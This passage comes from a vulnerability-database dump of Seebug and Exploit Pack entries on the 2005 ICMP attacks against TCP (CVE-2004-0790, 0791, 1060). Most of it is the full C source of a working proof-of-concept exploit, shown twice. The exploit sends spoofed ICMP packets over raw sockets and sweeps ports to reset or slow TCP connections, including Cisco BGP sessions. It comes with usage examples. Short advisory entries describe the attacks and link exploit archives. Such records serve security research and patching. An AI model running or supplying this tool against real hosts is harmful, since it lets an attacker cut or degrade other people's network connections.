(tolower(argv[i][1])) {\r\n case 'f':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iFromPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwFromIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 't':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iToPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwToIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 'n':\r\n if (strlen(argv[i]) > 3)\r\n dwCount = atol(&argv[i][3]);\r\n break;\r\n case 'a':\r\n if (strlen(argv[i]) > 3)\r\n Attack = atol(&argv[i][3]);\r\n if ((Attack > 3) || (Attack < 1))\r\n usage(argv[0]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\n/* This function calculates the 16-bit one's complement sum */\r\n/* for the supplied buffer */\r\nunsigned short\r\nchecksum(unsigned short *buffer, int size)\r\n{\r\n unsigned long cksum = 0;\r\n\r\n while (size > 1) {\r\n cksum += *buffer++;\r\n size -= sizeof(unsigned short);\r\n }\r\n if (size) {\r\n cksum += *(unsigned char *)buffer;\r\n }\r\n cksum = (cksum >> 16) + (cksum & 0xffff);\r\n cksum += (cksum >>16);\r\n\r\n return (unsigned short)(~cksum);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\r\n#ifdef _WIN32\r\n WSADATA wsd;\r\n#endif\r\n int s;\r\n#ifdef _WIN32\r\n BOOL bOpt;\r\n#else\r\n int bOpt;\r\n#endif\r\n struct sockaddr_in remote;\r\n IP_HDR ipHdr,\r\n ipHdrInc;\r\n ICMP_HDR icmpHdr;\r\n int ret;\r\n unsigned long i, p;\r\n unsigned short iTotalSize,\r\n iIPVersion,\r\n iIPSize,\r\n p2,\r\n cksum = 0;\r\n char buf[MAX_PACKET],\r\n *ptr = NULL;\r\n#ifdef _WIN32\r\n IN_ADDR addr;\r\n#else\r\n struct sockaddr_in addr;\r\n#endif\r\n\r\n printf("\\n (MS05-019) (CISCO:20050412)\\n");\r\n printf(" ICMP attacks against TCP 
(Proof-of-Concept)\\n\\n");\r\n printf(" Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n");\r\n\r\n if (argc < 3) usage(argv[0]);\r\n\r\n /* Parse command line arguments and print them out */\r\n ValidateArgs(argc, argv);\r\n#ifdef _WIN32\r\n addr.S_un.S_addr = dwFromIP;\r\n printf("[*] From IP: <%s>, port: %d\\n", inet_ntoa(addr), iFromPort);\r\n addr.S_un.S_addr = dwToIP;\r\n printf("[*] To IP: <%s>, port: %d\\n", inet_ntoa(addr), iToPort);\r\n printf("[*] Count: %d\\n", dwCount);\r\n#else\r\n addr.sin_addr.s_addr = dwFromIP;\r\n printf("[*] From IP: <%s>, port: %d\\n", inet_ntoa(addr.sin_addr), iFromPort);\r\n addr.sin_addr.s_addr = dwToIP;\r\n printf("[*] To IP: <%s>, port: %d\\n", inet_ntoa(addr.sin_addr), iToPort);\r\n printf("[*] Count: %d\\n", dwCount);\r\n#endif\r\n\r\n#ifdef _WIN32\r\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\r\n printf("[-] WSAStartup() failed: %d\\n", GetLastError());\r\n return -1;\r\n }\r\n#endif\r\n /* Creating a raw socket */\r\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\r\n#ifdef _WIN32\r\n if (s == INVALID_SOCKET) {\r\n#else\r\n if (s < 0) {\r\n#endif\r\n printf("[-] socket() failed\\n");\r\n return -1;\r\n }\r\n\r\n /* Enable the IP header include option */\r\n#ifdef _WIN32\r\n bOpt = TRUE;\r\n#else\r\n bOpt = 1;\r\n#endif\r\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n printf("[-] setsockopt(IP_HDRINCL) failed: %d\\n", WSAGetLastError());\r\n return -1;\r\n }\r\n#endif\r\n\r\n /* Initalize the IP header */\r\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\r\n\r\n iIPVersion = 4;\r\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\r\n\r\n ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdr.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdr.ip_totallength = htons(iTotalSize);\r\n ipHdr.ip_id = htons(42451); /* Unique identifier */\r\n ipHdr.ip_offset = 0; /* Fragment offset 
field */\r\n ipHdr.ip_ttl = 255; /* Time to live */\r\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\r\n ipHdr.ip_checksum = 0; /* IP checksum */\r\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\r\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\r\n\r\n ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdrInc.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\r\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\r\n\r\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\r\n ipHdrInc.ip_ttl = 255; /* Time to live */\r\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\r\n ipHdrInc.ip_checksum = 0; /* IP checksum */\r\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\r\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\r\n\r\n /* Initalize the ICMP header */\r\n icmpHdr.checksum = 0;\r\n if (Attack == 1) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 2; /* protocol unreachable */\r\n icmpHdr.unused = 0;\r\n } else if (Attack == 2) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 4; /* fragmentation needed and DF set */\r\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\r\n } else {\r\n icmpHdr.type = 4; /* Source Quench Message */\r\n icmpHdr.code = 0;\r\n icmpHdr.unused = 0;\r\n }\r\n\r\n memset(buf, 0, MAX_PACKET);\r\n ptr = buf;\r\n\r\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\r\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\r\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\r\n memcpy(ptr, msg, sizeof(msg)-1);\r\n iFromPort = htons(iFromPort);\r\n memcpy(ptr, &iFromPort, 2);\r\n\r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(iToPort);\r\n remote.sin_addr.s_addr = dwToIP;\r\n\r\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\r\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\r\n\r\n cksum = checksum((unsigned short 
*)&ipHdr, 20);\r\n memcpy(buf+10, &cksum, 2);\r\n\r\n for (p = iToPort; p <= 65535; p++) {\r\n p2 = htons((short)p);\r\n memcpy((char *)(ptr+2), &p2, 2);\r\n buf[22] = 0;\r\n buf[23] = 0;\r\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\r\n memcpy(buf+20+2, &cksum, 2);\r\n\r\n for (i = 0; i < dwCount; i++) {\r\n#ifdef _WIN32\r\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\r\n sizeof(remote));\r\n#else\r\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\r\n sizeof(remote));\r\n#endif\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n#else\r\n if (ret < 0) {\r\n#endif\r\n printf("[-] sendto() failed\\n");\r\n break;\r\n }\r\n }\r\n }\r\n\r\n#ifdef _WIN32\r\n closesocket(s);\r\n WSACleanup();\r\n#endif\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-04-20]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15543", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:39:51", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple Vendor ICMP Message Handling DoS", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79052", "id": "SSV:79052", "sourceData": "\n source: http://www.securityfocus.com/bid/13124/info\r\n \r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n \r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n \r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. 
As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n \r\nThe following individual attacks are reported:\r\n \r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n \r\n- An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. 
The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n \r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n \r\n**Update: Microsoft platforms are also reported prone to these issues.\r\n \r\nhttp://www.exploit-db.com/sploits/25389.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79052", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T14:57:41", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63076", "id": "SSV:63076", "sourceData": "\n /* HOD-icmp-attacks-poc.c: 2005-04-15: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2004-2005 houseofdabus.\r\n*\r\n* (MS05-019) (CISCO:20050412)\r\n* ICMP attacks against TCP (Proof-of-Concept)\r\n*\r\n*\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n*\r\n*\r\n* [ for more details:\r\n* [ http://www.livejournal.com/users/houseofdabus\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Cisco Content Services Switch 11000 Series (WebNS)\r\n* - Cisco Global Site Selector (GSS) 4480 1.x\r\n* - Cisco IOS 10.x\r\n* - Cisco IOS 11.x\r\n* - Cisco IOS 12.x\r\n* - Cisco IOS R11.x\r\n* - Cisco IOS R12.x\r\n* - Cisco IOS XR (CRS-1) 3.x\r\n* - Cisco ONS 15000 Series\r\n* - Cisco PIX 6.x\r\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\r\n* - AIX 5.x\r\n* - Windows Server 2003\r\n* - Windows XP SP2\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Windows 2000 SP3\r\n* ...\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A denial of service vulnerability 
exists that could allow an\r\n* attacker to send a specially crafted Internet Control Message\r\n* Protocol (ICMP) message to an affected system. An attacker who\r\n* successfully exploited this vulnerability could cause the affected\r\n* system to reset existing TCP connections, reduce the throughput\r\n* in existing TCP connections, or consume large amounts of CPU and\r\n* memory resources.\r\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\r\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\r\n*\r\n* Other References:\r\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\n* http://www.kb.cert.org/vuls/id/222750\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows Server 2003\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Cisco IOS 11.x\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Examples:\r\n*\r\n* client <---> router <---> router <---> server\r\n*\r\n* CLIENT <---> SERVER\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\r\n* (abort the connection)\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n*\r\n* ROUTER1 <---> ROUTER2\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:179 -a:1\r\n* (DoS Cisco BGP Connections)\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n* 
---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*/\r\n\r\n/* #define _WIN32 */\r\n\r\n#ifdef _WIN32\r\n#pragma comment(lib,"ws2_32")\r\n#pragma pack(1)\r\n#define WIN32_LEAN_AND_MEAN\r\n#include <winsock2.h>\r\n/* IP_HDRINCL */\r\n#include <ws2tcpip.h>\r\n\r\n#else\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <sys/timeb.h>\r\n#endif\r\n\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define MAX_PACKET 4096\r\n\r\n#define DEFAULT_PORT 80\r\n#define DEFAULT_IP "192.168.0.1"\r\n#define DEFAULT_COUNT 1\r\n\r\n/* Define the IP header */\r\ntypedef struct ip_hdr {\r\n unsigned char ip_verlen; /* IP version & length */\r\n unsigned char ip_tos; /* IP type of service */\r\n unsigned short ip_totallength; /* Total length */\r\n unsigned short ip_id; /* Unique identifier */\r\n unsigned short ip_offset; /* Fragment offset field */\r\n unsigned char ip_ttl; /* Time to live */\r\n unsigned char ip_protocol; /* Protocol */\r\n unsigned short ip_checksum; /* IP checksum */\r\n unsigned int ip_srcaddr; /* Source address */\r\n unsigned int ip_destaddr; /* Destination address */\r\n} IP_HDR, *PIP_HDR;\r\n\r\n/* Define the ICMP header */\r\n/* Destination Unreachable Message */\r\ntypedef struct icmp_hdr {\r\n unsigned char type; /* Type */\r\n unsigned char code; /* Code */\r\n unsigned short checksum; /* Checksum */\r\n unsigned long unused; /* Unused */\r\n} ICMP_HDR, *PICMP_HDR;\r\n\r\n/* 64 bits of Original Data Datagram (TCP header) */\r\nchar msg[] =\r\n"\\x00\\x50" /* Source port */\r\n"\\x00\\x50" /* Destination port */\r\n"\\x23\\x48\\x4f\\x44";\r\n\r\n/* globals */\r\nunsigned long dwToIP, /* IP to send to */\r\n dwFromIP; 
/* IP to send from (spoof) */\r\nunsigned short iToPort, /* Port to send to */\r\n iFromPort; /* Port to send from (spoof) */\r\nunsigned long dwCount; /* Number of times to send */\r\nunsigned long Attack;\r\n\r\nvoid\r\nusage(char *progname) {\r\n printf("Usage:\\n\\n");\r\n printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\\n\\n", progname);\r\n printf(" -fi:IP From (sender) IP address\\n");\r\n printf(" -ti:IP To (target) IP address\\n");\r\n printf(" -fp:int Target open TCP port number\\n");\r\n printf(" (for example - 21, 25, 80)\\n");\r\n printf(" -tp:int Inicial value for bruteforce (sender) TCP port number\\n");\r\n printf(" (default: 0 = range of ports 0-65535)\\n");\r\n printf(" -n:int Number of packets\\n\\n");\r\n printf(" -a:int ICMP attacks:\\n");\r\n printf(" 1 - Blind connection-reset attack\\n");\r\n printf(" (ICMP protocol unreachable)\\n");\r\n printf(" 2 - Path MTU discovery attack\\n");\r\n printf(" (slow down the transmission rate)\\n");\r\n printf(" 3 - ICMP Source Quench attack\\n");\r\n exit(1);\r\n}\r\n\r\nvoid\r\nValidateArgs(int argc, char **argv)\r\n{\r\n int i;\r\n\r\n iToPort = 0;\r\n iFromPort = DEFAULT_PORT;\r\n dwToIP = inet_addr(DEFAULT_IP);\r\n dwFromIP = inet_addr(DEFAULT_IP);\r\n dwCount = DEFAULT_COUNT;\r\n Attack = 1;\r\n\r\n for (i = 1; i < argc; i++) {\r\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\r\n switch (tolower(argv[i][1])) {\r\n case 'f':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iFromPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwFromIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 't':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iToPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwToIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n 
break;\r\n }\r\n break;\r\n case 'n':\r\n if (strlen(argv[i]) > 3)\r\n dwCount = atol(&argv[i][3]);\r\n break;\r\n case 'a':\r\n if (strlen(argv[i]) > 3)\r\n Attack = atol(&argv[i][3]);\r\n if ((Attack > 3) || (Attack < 1))\r\n usage(argv[0]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\n/* This function calculates the 16-bit one's complement sum */\r\n/* for the supplied buffer */\r\nunsigned short\r\nchecksum(unsigned short *buffer, int size)\r\n{\r\n unsigned long cksum = 0;\r\n\r\n while (size > 1) {\r\n cksum += *buffer++;\r\n size -= sizeof(unsigned short);\r\n }\r\n if (size) {\r\n cksum += *(unsigned char *)buffer;\r\n }\r\n cksum = (cksum >> 16) + (cksum & 0xffff);\r\n cksum += (cksum >>16);\r\n\r\n return (unsigned short)(~cksum);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\r\n#ifdef _WIN32\r\n WSADATA wsd;\r\n#endif\r\n int s;\r\n#ifdef _WIN32\r\n BOOL bOpt;\r\n#else\r\n int bOpt;\r\n#endif\r\n struct sockaddr_in remote;\r\n IP_HDR ipHdr,\r\n ipHdrInc;\r\n ICMP_HDR icmpHdr;\r\n int ret;\r\n unsigned long i, p;\r\n unsigned short iTotalSize,\r\n iIPVersion,\r\n iIPSize,\r\n p2,\r\n cksum = 0;\r\n char buf[MAX_PACKET],\r\n *ptr = NULL;\r\n#ifdef _WIN32\r\n IN_ADDR addr;\r\n#else\r\n struct sockaddr_in addr;\r\n#endif\r\n\r\n printf("\\n (MS05-019) (CISCO:20050412)\\n");\r\n printf(" ICMP attacks against TCP (Proof-of-Concept)\\n\\n");\r\n printf(" Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n");\r\n\r\n if (argc < 3) usage(argv[0]);\r\n\r\n /* Parse command line arguments and print them out */\r\n ValidateArgs(argc, argv);\r\n#ifdef _WIN32\r\n addr.S_un.S_addr = dwFromIP;\r\n printf("[*] From IP: <%s>, port: %d\\n", inet_ntoa(addr), iFromPort);\r\n addr.S_un.S_addr = dwToIP;\r\n printf("[*] To IP: <%s>, port: %d\\n", inet_ntoa(addr), iToPort);\r\n printf("[*] Count: %d\\n", dwCount);\r\n#else\r\n addr.sin_addr.s_addr = dwFromIP;\r\n printf("[*] From IP: <%s>, port: %d\\n", 
inet_ntoa(addr.sin_addr), iFromPort);\r\n addr.sin_addr.s_addr = dwToIP;\r\n printf("[*] To IP: <%s>, port: %d\\n", inet_ntoa(addr.sin_addr), iToPort);\r\n printf("[*] Count: %d\\n", dwCount);\r\n#endif\r\n\r\n#ifdef _WIN32\r\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\r\n printf("[-] WSAStartup() failed: %d\\n", GetLastError());\r\n return -1;\r\n }\r\n#endif\r\n /* Creating a raw socket */\r\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\r\n#ifdef _WIN32\r\n if (s == INVALID_SOCKET) {\r\n#else\r\n if (s < 0) {\r\n#endif\r\n printf("[-] socket() failed\\n");\r\n return -1;\r\n }\r\n\r\n /* Enable the IP header include option */\r\n#ifdef _WIN32\r\n bOpt = TRUE;\r\n#else\r\n bOpt = 1;\r\n#endif\r\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n printf("[-] setsockopt(IP_HDRINCL) failed: %d\\n", WSAGetLastError());\r\n return -1;\r\n }\r\n#endif\r\n\r\n /* Initalize the IP header */\r\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\r\n\r\n iIPVersion = 4;\r\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\r\n\r\n ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdr.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdr.ip_totallength = htons(iTotalSize);\r\n ipHdr.ip_id = htons(42451); /* Unique identifier */\r\n ipHdr.ip_offset = 0; /* Fragment offset field */\r\n ipHdr.ip_ttl = 255; /* Time to live */\r\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\r\n ipHdr.ip_checksum = 0; /* IP checksum */\r\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\r\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\r\n\r\n ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdrInc.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\r\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\r\n\r\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\r\n 
ipHdrInc.ip_ttl = 255; /* Time to live */\r\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\r\n ipHdrInc.ip_checksum = 0; /* IP checksum */\r\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\r\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\r\n\r\n /* Initalize the ICMP header */\r\n icmpHdr.checksum = 0;\r\n if (Attack == 1) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 2; /* protocol unreachable */\r\n icmpHdr.unused = 0;\r\n } else if (Attack == 2) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 4; /* fragmentation needed and DF set */\r\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\r\n } else {\r\n icmpHdr.type = 4; /* Source Quench Message */\r\n icmpHdr.code = 0;\r\n icmpHdr.unused = 0;\r\n }\r\n\r\n memset(buf, 0, MAX_PACKET);\r\n ptr = buf;\r\n\r\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\r\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\r\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\r\n memcpy(ptr, msg, sizeof(msg)-1);\r\n iFromPort = htons(iFromPort);\r\n memcpy(ptr, &iFromPort, 2);\r\n\r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(iToPort);\r\n remote.sin_addr.s_addr = dwToIP;\r\n\r\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\r\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\r\n\r\n cksum = checksum((unsigned short *)&ipHdr, 20);\r\n memcpy(buf+10, &cksum, 2);\r\n\r\n for (p = iToPort; p <= 65535; p++) {\r\n p2 = htons((short)p);\r\n memcpy((char *)(ptr+2), &p2, 2);\r\n buf[22] = 0;\r\n buf[23] = 0;\r\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\r\n memcpy(buf+20+2, &cksum, 2);\r\n\r\n for (i = 0; i < dwCount; i++) {\r\n#ifdef _WIN32\r\n ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\r\n sizeof(remote));\r\n#else\r\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\r\n sizeof(remote));\r\n#endif\r\n#ifdef _WIN32\r\n if (ret == 
SOCKET_ERROR) {\r\n#else\r\n if (ret < 0) {\r\n#endif\r\n printf("[-] sendto() failed\\n");\r\n break;\r\n }\r\n }\r\n }\r\n\r\n#ifdef _WIN32\r\n closesocket(s);\r\n WSACleanup();\r\n#endif\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-04-20]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63076", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:38:01", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Multiple Vendor ICMP Implementation Spoofed Source Quench Packet DoS", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79050", "id": "SSV:79050", "sourceData": "\n source: http://www.securityfocus.com/bid/13124/info\r\n\r\nMultiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks.\r\n\r\nICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message.\r\n\r\nReportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection.\r\n\r\nThe following individual attacks are reported:\r\n\r\n- A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users.\r\n\r\n- An ICMP Source Quench attack. 
This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n- An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue.\r\n\r\nA remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users.\r\n\r\n**Update: Microsoft platforms are also reported prone to these issues. \r\n\r\nhttp://www.exploit-db.com/sploits/25387.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-79050", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:35", "description": "\nMultiple Vendor ICMP Message Handling - Denial of Service", "edition": 2, "cvss3": {}, "published": "2005-04-12T00:00:00", "title": "Multiple Vendor ICMP Message Handling - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0791", 